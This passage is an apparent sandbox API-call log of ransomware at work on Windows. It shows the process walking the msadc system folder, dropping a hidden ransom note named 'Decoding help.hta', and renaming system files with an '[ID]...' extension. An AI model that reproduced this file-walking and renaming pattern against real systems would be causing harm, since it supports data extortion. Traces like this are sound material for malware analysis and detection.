files\\system\\en-us\\wab32res.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.545] FindNextFileW (in: hFindFile=0x5e30f0, lpFindFileData=0x1ca9fd30 | out: lpFindFileData=0x1ca9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9e3de6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xc9e3de6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 0 [0044.545] FindClose (in: hFindFile=0x5e30f0 | out: hFindFile=0x5e30f0) returned 1 Thread: id = 439 os_tid = 0xbdc [0044.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*", lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3570 [0045.538] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.538] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.814] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.814] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.814] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d6f591, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x1d6f591, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0xab5525a7, ftLastWriteTime.dwHighDateTime=0x1ca03fd, nFileSizeHigh=0x0, nFileSizeLow=0x276, dwReserved0=0x0, dwReserved1=0x0, cFileName="adcjavas.inc", cAlternateFileName="")) returned 1 [0048.815] lstrcpyW (in: lpString1=0x10cfea08, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0048.815] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0048.815] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0048.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0xffffffff [0048.815] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0050.384] WriteFile (in: hFile=0x1b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1cbdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1cbdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.539] CloseHandle (hObject=0x1b8) returned 1 [0053.666] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.622] lstrcmpiW (lpString1="Decoding help.hta", lpString2="adcjavas.inc") returned 1 [0057.622] lstrlenW (lpString="adcjavas.inc") returned 12 [0057.622] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0057.622] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0057.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="adcjavas.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc" [0057.622] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc" [0057.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0057.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcjavas.inc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcjavas.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.623] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d956f0, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x1d956f0, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0xab636de1, ftLastWriteTime.dwHighDateTime=0x1ca03fd, nFileSizeHigh=0x0, nFileSizeLow=0x26f, dwReserved0=0x0, dwReserved1=0x0, cFileName="adcvbs.inc", cAlternateFileName="")) returned 1 [0057.623] lstrcpyW (in: lpString1=0x42b8870, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0057.623] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0057.623] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0057.623] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0057.623] lstrcmpiW (lpString1="Decoding help.hta", lpString2="adcvbs.inc") returned 1 [0057.623] lstrlenW (lpString="adcvbs.inc") returned 10 [0057.623] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0057.623] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0057.623] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="adcvbs.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc" [0057.623] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc" [0057.623] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0057.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcvbs.inc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcvbs.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.011] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0059.011] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0059.011] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0059.011] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0059.011] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.011] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.012] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US" [0059.012] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\*.*" [0059.012] GlobalMemoryStatus (in: lpBuffer=0x1cbdfd10 | out: lpBuffer=0x1cbdfd10) [0059.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9388250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x30c [0059.012] CloseHandle (hObject=0x30c) returned 1 [0059.012] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22c9a97c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0x22c9a97c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0x22c9a97c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x206, dwReserved0=0x0, dwReserved1=0x0, cFileName="handler.reg", cAlternateFileName="")) returned 1 [0059.013] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.013] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.013] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.013] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.013] lstrcmpiW (lpString1="Decoding help.hta", lpString2="handler.reg") returned -1 [0059.013] lstrlenW (lpString="handler.reg") returned 11 [0059.013] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.013] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.013] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="handler.reg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg" [0059.013] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg" [0059.013] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg.[ID]g9uZrLhJaygpwRm1[ID]" [0059.013] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handler.reg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handler.reg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.013] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8dd6e4, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0x6f8dd6e4, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x22f4823c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x24c, dwReserved0=0x0, dwReserved1=0x0, cFileName="handsafe.reg", cAlternateFileName="")) returned 1 [0059.013] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.013] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.013] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.013] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.013] lstrcmpiW (lpString1="Decoding help.hta", lpString2="handsafe.reg") returned -1 [0059.014] lstrlenW (lpString="handsafe.reg") returned 12 [0059.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.014] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="handsafe.reg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg" [0059.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg" [0059.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg.[ID]g9uZrLhJaygpwRm1[ID]" [0059.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handsafe.reg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handsafe.reg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.014] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x930aeeb4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x930aeeb4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x930d5014, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x89000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0059.014] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.014] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.014] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadce.dll") returned -1 [0059.014] lstrlenW (lpString="msadce.dll") returned 10 [0059.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.014] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msadce.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll" [0059.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll" [0059.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadce.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadce.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.015] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0b5cb2a, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb0b5cb2a, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5f8ffe50, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcer.dll", cAlternateFileName="")) returned 1 [0059.015] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.015] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.015] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" [0059.015] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.015] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadcer.dll") returned -1 [0059.015] lstrlenW (lpString="msadcer.dll") returned 11 [0059.015] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.015] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.015] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\", lpString2="msadcer.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll" [0059.015] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll" [0059.016] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcer.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcer.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.016] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1cbdfd30 | out: lpFindFileData=0x1cbdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b9ffeb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x92b9ffeb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92b9ffeb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcf.dll", cAlternateFileName="")) returned 1 [0059.016] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0059.016] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned 56 [0059.016] lstrcatW 